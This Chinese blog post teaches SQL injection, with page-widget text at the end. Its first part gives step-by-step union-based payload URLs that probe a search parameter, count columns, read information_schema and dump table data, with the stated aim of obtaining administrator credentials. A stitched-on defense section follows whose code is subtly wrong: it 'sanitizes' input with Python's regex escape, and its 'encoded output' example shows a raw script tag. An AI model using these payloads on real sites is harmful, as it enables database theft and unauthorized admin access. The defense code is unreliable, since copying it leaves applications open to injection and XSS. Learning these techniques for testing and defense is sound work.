SQL注入原理及具体步骤

SQL注入原理

步骤

  1. 通过特殊的数据库查询语句
  2. 在数据库的错误返回中找到sql漏洞
  3. 利用sql语句猜解管理人员信息并登陆管理员后台

判断注入类型

下面提到的是数字型和字符型的注入, sql注入还有基于报错型SQL注入、基于布尔/时间的SQL注入、可联合查询的SQL注入

判断数字型注入

  1. url为 http://192.168.1.1/search?id=1’时
    有一个多余的“’”使查询错误
  2. url为 http://192.168.1.1/search?id=1 and 1 = 1 时, 没有报错, 除非在代码处做了限制(不允许有and字符串)
  3. url为 http://192.168.1.1/search?id=1 and 1 = 2 时, 由于1=2不成立, 也会报错

判断字符型注入

url同样为 http://192.168.1.1/search?id=1’时, 数据库认为id叫做“1’”,查询之后发现没有这个id而返回错误.

在字符型注入中,需要考虑引号的闭合

http://192.168.1.1/search?id=1’ and ‘1’=‘1
在’1’=‘1 之后没有加上’是因为传参时输入的内容已经被’ '包围.

判断后台查询列数

使用order by 试出数据库列数
http://192.168.1.1/search?id=1’ order by 数字
如果试6时返回错误, 5时正确.那么列数为5

找显示位

使用union select找出会返回给客户端并显示的列.
如果有5列时,应该这么写http://192.168.1.1/search?id=1 union select 1,2,3,4,5
加入显示位是5,这就意味着数据库之开放了“5”这个窗口用以显示,那么在查询其他信息(如数据库名)时应该用需要查询到信息替换它来显示这些信息

查库名

  • 联合查询: select database();

假如显示位是5, http://192.168.1.1/search?id=1 union select 1,2,3,4,database()

  • 盲注使用其他方法
    (还没学到这里,到时候补充)

查表名

找到库名之后
使用http://192.168.1.1/search?id=1 union select 1,2,3,4,table_name from information_schema.tables where table_schema=‘库名’

如果是字符型,此处库名要转换成十六进制

information_schema

这是一个mysql自带的库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等,故我们需要查询这个库

查列名

http://192.168.1.1/search?id=1 union select 1,2,3,4,column_name from information_schema.columns where table_name=‘表名’

如果是字符型,此处表名要转换成十六进制

如果表数或列数过多,可以在最后使用limit

加上limit 0,5 相当于检索1-5条

查具体数据

http://192.168.1.1/search?id=1 union select 1,2,3,4,group_concat(查询的数据) from 表名

### SQL 注入原理 SQL注入是一种攻击方式,通过该方法可以向应用程序发送恶意的SQL语句并执行。当Web应用未能正确过滤用户输入中的特殊字符时,攻击者能够构造特定形式的数据作为参数提交给数据库查询命令。如果这些数据未被适当处理,则可能导致原始查询逻辑改变,进而被执行任意指令。 例如,在登录表单中用户名字段可能存在如下漏洞: ```sql SELECT * FROM users WHERE username='admin' AND password='password'; ``` 假设此查询用于验证用户身份,而程序直接拼接字符串来构建最终要发往DBMS执行的SQL语句。此时,若允许未经检查就插入额外的内容到`username`变量里,那么黑客就可以利用这一点绕过认证机制[^1]。 ### 防护措施 为了防止SQL注入的发生,应当采取多种手段相结合的方式来进行防御: #### 输入过滤与转义危险字符 对于所有来自外部环境(如HTTP请求)的信息都应视为不可信源,并对其进行严格的校验清理工作。具体来说就是去除掉那些可能引起语法错误或者具有潜在危害作用的符号;同时还要注意对一些保留字加以转换以免造成混淆误判的情况发生。 ```python import re def sanitize_input(user_input): # Remove or escape special characters from user input sanitized = re.escape(user_input) return sanitized ``` #### 使用预编译语句及参数化查询 采用PreparedStatement接口所提供的功能可以在很大程度上规避风险。因为这种方式下占位符会被服务器端解释成固定位置上的常量而非可变部分,所以即使传入了带有破坏意图的数据也无法影响整个表达式的结构完整性。 ```java String query = "SELECT * FROM users WHERE username=? AND password=?"; try (Connection conn = DriverManager.getConnection(url); PreparedStatement pstmt = conn.prepareStatement(query)) { pstmt.setString(1, userInputUsername); // Set parameter value safely pstmt.setString(2, userInputPassword); ResultSet rs = pstmt.executeQuery(); } ``` #### 输出编码 确保输出至网页的内容经过恰当编码以阻止脚本执行行为。这一步骤同样适用于防范跨站脚本攻击(XSS),即把动态生成的部分按照HTML标准格式呈现出来而不是当作纯文本对待。 ```html <!-- Example of encoding output --> <p>User submitted: <script>alert('XSS')</script></p> ``` 综上所述,遵循安全编程的最佳实践——包括但不限于上述提到的技术策略——可以帮助有效地抵御SQL注入威胁,保护信息系统免受此类侵害的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值